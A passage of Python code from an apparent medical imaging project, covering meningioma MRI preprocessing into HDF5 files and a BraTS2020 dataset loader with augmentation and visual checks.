(z,x,y) image_resample_t2 = padding_image_array_size(resampled_image, out_size=(24, 256, 256)) # print(image_resample_t2.shape) resampled_image = resample_image(nrrd_t1_data, (1., 1., 6.5), is_label=True) # itk_image.GetSize (x,y,z) resampled_image = sitk.GetArrayFromImage(resampled_image) # GetArrayFromImage (z,x,y) image_resample_t1_label = padding_image_array_size(resampled_image, out_size=(24, 256, 256)) if nrrd_fl_data == "": # 如果没有水肿区域,则全0初始化即可。 image_resample_t2_label = np.zeros_like(image_resample_t2) # itk_image_resample = sitk.GetImageFromArray(nrrd_fl_data) # sitk.WriteImage(itk_image_resample, "./data/label_data/mask/" + each_patient_dir + '_t2_mask.nii.gz') else: resampled_image = resample_image(nrrd_fl_data, (1., 1., 6.5), is_label=True) # itk_image.GetSize (x,y,z) resampled_image = sitk.GetArrayFromImage(resampled_image) # GetArrayFromImage (z,x,y) image_resample_t2_label = padding_image_array_size(resampled_image, out_size=(24, 256, 256)) image_resample_t1 = resample_image_array_size(image_resample_t1, out_size=(32, 256, 256), order=3) image_resample_t2 = resample_image_array_size(image_resample_t2, out_size=(32, 256, 256), order=3) image_resample_t1_label = resample_image_array_size(image_resample_t1_label, out_size=(32, 256, 256), order=1) image_resample_t2_label = resample_image_array_size(image_resample_t2_label, out_size=(32, 256, 256), order=1) image_resample = np.stack([image_resample_t1, image_resample_t2]) image_resample_label = np.stack([image_resample_t1_label, image_resample_t2_label]) # for k in range(5, 28): # plt.subplot(2, 2, 1) # plt.imshow(image_resample_t1[k], cmap="gray") # plt.subplot(2, 2, 2) # plt.imshow(image_resample_t1_label[k], cmap="gray") # plt.subplot(2, 2, 3) # plt.imshow(image_resample_t2[k], cmap="gray") # plt.subplot(2, 2, 4) # plt.imshow(image_resample_t2_label[k], cmap="gray") # plt.show() # break h5_file_img = h5py.File("./data/Meningiomas/" + each_patient_dir + "_data.h5", "w") h5_file_img.create_dataset("image", data=image_resample, compression="gzip") h5_file_img.create_dataset("label", data=image_resample_label, compression="gzip") h5_file_img.close() if __name__ == "__main__": ## 处理原始数据 # read_data("./Grade I(所有病人数据)/") # read_data("./data/label/Grade_1") # read_data("/home/datasets/Meningiomas/Data_Processing/label/Grade_1/") # read_data("/home/datasets/Meningiomas/Data_Processing/label/Grade_1/") read_data("/home/datasets/Meningiomas/Data_Processing/label/Grade_2_invasion/") read_data("/home/datasets/Meningiomas/Data_Processing/label/Grade_2_noninvasion/") ``` #### File: MedicalSeg/test/test_brats2020_data.py ```python from functools import total_ordering import matplotlib.pyplot as plt import glob from tqdm import tqdm import numpy as np import torch import SimpleITK as sitk from medical_seg.transformer import RandomRotate, RandCropByPosNegLabel, RandomFlip, \ AdditiveGaussianNoise, AdditivePoissonNoise, Standardize, \ CenterSpatialCrop, Elatic, MirrorTransform, GammaTransformer from torch.utils.data import DataLoader, Dataset import time seed = 3213214325 sample_size = 2 random_state = np.random.RandomState(seed) spatial_size = (128, 128, 128) class Transform: def __init__(self, random_state) -> None: self.random_state = random_state self.rf = RandomFlip(self.random_state, execution_probability=1) self.rr = RandomRotate(self.random_state, angle_spectrum=30, execution_probability=1) self.elastic = Elatic(self.random_state, alpha=(0, 900), sigma=(9, 13), scale=(0.85, 1.25), order_seg=0, order_data=3, execution_probability=1) self.gamma = GammaTransformer(self.random_state, gamma_range=(0.5, 2), execution_probability=1) self.mirror = MirrorTransform(self.random_state, axes=(0, 1, 2), execution_probability=1) def __call__(self, image, label): start = time.time() image, label = self.rf(image, label) end = time.time() print(f"rf spend {end - start}") start = time.time() image, label = self.rr(image, label) end = time.time() print(f"rr spend {end - start}") # start = time.time() # image, label = self.elastic(m=image, seg=label) # end = time.time() # print(f"elastic spend {end - start}") start = time.time() # image, label = self.elastic(m=image, seg=label) image = self.gamma(image) end = time.time() print(f"gamma spend {end - start}") start = time.time() image, label = self.mirror(image, seg=label) end = time.time() print(f"mirror spend {end - start}") return image, label class BraTSDataset(Dataset): def __init__(self, paths, train=True) -> None: super().__init__() self.paths = paths[:4] self.train = train if train: self.transform = Transform(random_state=random_state) self.random_crop = RandCropByPosNegLabel(spatial_size=spatial_size, pos=1, neg=1, num_samples=sample_size, image=None, image_threshold=0, random_state=random_state) else : self.transform = None self.random_crop = None self.cached_image = [] self.cached_label = [] for p in tqdm(self.paths, total=len(self.paths), desc="loading training data........"): image, label = self._read_image(p) sd = Standardize(a_min=image.min(), a_max=image.max(), b_min=0, b_max=1, clip=True) image = sd(image) self.cached_image.append(image) self.cached_label.append(label) def __getitem__(self, i): image, label = self.cached_image[i], self.cached_label[i] if self.train: image, label = self.transform(image, label) image_patchs = self.random_crop(image, label=label) label_patchs = self.random_crop(label, label=label, is_label=True) # for i, imla in enumerate(zip(image_patchs, label_patchs)): # image_patchs[i], label_patchs[i] = self.transform(imla[0], imla[1]) else : assert len(image.shape) == 4, "image shape is must be 4." assert len(label.shape) == 3, "label shape is must be 3." image = [image] label = [label] if self.train: return { "image": image_patchs, "label": label_patchs } return { "image": image, "label": label, } def __len__(self): return len(self.paths) def _read_image(self, image_path): images = [] label = None paths = sorted(glob.glob(image_path + "/*.nii")) for p in paths: if "_seg.nii" in p: # 找到seg文件 label = sitk.ReadImage(p) label = sitk.GetArrayFromImage(label) else : image = sitk.ReadImage(p) image = sitk.GetArrayFromImage(image) images.append(image) images = np.array(images) return images, label def collate_fn(batch): assert len(batch) == 1, "随机crop时,请设置sample size,而batch size只能为1" batch = batch[0] image = batch["image"] label = batch["label"] image = np.array(image, dtype=np.float32) label = np.array(label, dtype=np.int16) return torch.from_numpy(image), torch.from_numpy(label) if __name__ == "__main__": data_paths = sorted(glob.glob("./data/MICCAI_BraTS2020_TrainingData/*"))[:-2] print(data_paths) train_paths = data_paths[:315] val_paths = data_paths[315:] ## test dataloader ds = BraTSDataset(paths=data_paths, train=True) dl = DataLoader(ds, batch_size=1, shuffle=False, collate_fn=collate_fn) import matplotlib.pyplot as plt for image, label in dl: print(image.shape) print(label.shape) plt.subplot(1, 5, 1) plt.imshow(image[0, 0, 60], cmap="gray") plt.subplot(1, 5, 2) plt.imshow(image[0, 1, 60], cmap="gray") plt.subplot(1, 5, 3) plt.imshow(image[0, 2, 60], cmap="gray") plt.subplot(1, 5, 4) plt.imshow(image[0, 3, 60], cmap="gray") plt.subplot(1, 5, 5) plt.imshow(label[0, 60], cmap="gray") plt.show() ```